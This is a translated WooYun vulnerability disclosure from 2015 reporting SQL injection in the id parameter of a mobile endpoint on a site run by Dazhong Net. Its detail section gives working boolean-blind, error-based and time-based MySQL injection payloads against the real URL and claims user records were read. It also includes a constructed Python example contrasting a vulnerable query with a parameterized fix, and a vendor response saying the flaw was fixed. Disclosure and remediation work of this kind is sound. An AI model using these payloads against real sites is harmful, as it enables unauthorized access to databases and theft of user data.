Vulnerability summary

Defect ID: wooyun-2015-0144505

Title: SQL injection on a site operated by 大众网 (Dazhong Net)

Vendor: 大众网

Reporter: 路人甲

Submitted: 2015-10-02 16:02

Fixed: 2015-10-08 15:50

Published: 2015-10-08 15:50

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: fixed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure timeline:

2015-10-02: details sent to the vendor, awaiting vendor response
2015-10-08: vendor confirmed; details disclosed to the vendor only
2015-10-08: vendor fixed the vulnerability and chose to publish; details disclosed to the public

Brief description:

I don't know how to do anything else, I just scan for injection...

Detailed description:

http://m.zyql.cn/?m=android/scenic.scenicDetail&id=64


Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: m=android/scenic.scenicDetail&id=64 AND 1812=1812
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=android/scenic.scenicDetail&id=64 AND (SELECT 3290 FROM(SELECT COUNT(*),CONCAT(0x3a7267763a,(SELECT (CASE WHEN (3290=3290) THEN 1 ELSE 0 END)),0x3a7365633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: m=android/scenic.scenicDetail&id=64 AND SLEEP(5)
---


[289 tables]

Proof of vulnerability:

Read a few users at random...


Suggested fix:

Filter, filter, filter!
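The boolean-based blind finding above works because whatever arrives in `id` is spliced into the WHERE clause, so `64 AND 1812=1812` returns the same row as `64`. The following added example (not the site's code; the table and row names are constructed stand-ins) shows that pattern beside a hardened handler that validates the type and binds the value, and a small regression check a defender can run against both:

```python
import sqlite3

def make_db():
    # Constructed stand-in for the scenic table behind scenicDetail (not the real schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE scenic (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO scenic VALUES (?, ?)",
                     [(64, "Scenic 64"), (65, "Scenic 65")])
    return conn

def scenic_detail_vulnerable(conn, raw_id):
    # Vulnerable pattern: the raw ?id= value is concatenated into the SQL text,
    # so "64 AND 1812=1812" becomes part of the WHERE clause.
    sql = "SELECT id, name FROM scenic WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def scenic_detail_fixed(conn, raw_id):
    # Hardened: reject anything that is not a plain integer, then bind it as a
    # parameter so the value can never change the query's structure.
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, name FROM scenic WHERE id = ?",
                        (int(raw_id),)).fetchall()

def boolean_oracle_present(conn, handler, base="64"):
    # Regression check using the TRUE/FALSE pair sqlmap reported: if a true
    # condition leaves the result unchanged and a false one empties it, the
    # handler still exposes a boolean oracle. A rejected input means no oracle.
    try:
        expected = handler(conn, base)
        with_true = handler(conn, base + " AND 1812=1812")
        with_false = handler(conn, base + " AND 1812=1813")
    except ValueError:
        return False
    return with_true == expected and with_false != expected

if __name__ == "__main__":
    print("vulnerable handler leaks oracle:",
          boolean_oracle_present(make_db(), scenic_detail_vulnerable))
    print("fixed handler leaks oracle:",
          boolean_oracle_present(make_db(), scenic_detail_fixed))
```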

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-10-08 11:36

Vendor reply:

Thanks to all the 路人甲 out there.
The boss rushed to the scene right away and personally lectured the developers; the developers are currently in a stable mood.

Latest status:

2015-10-08: filtering applied; code review continuing.

2015-10-08: fixed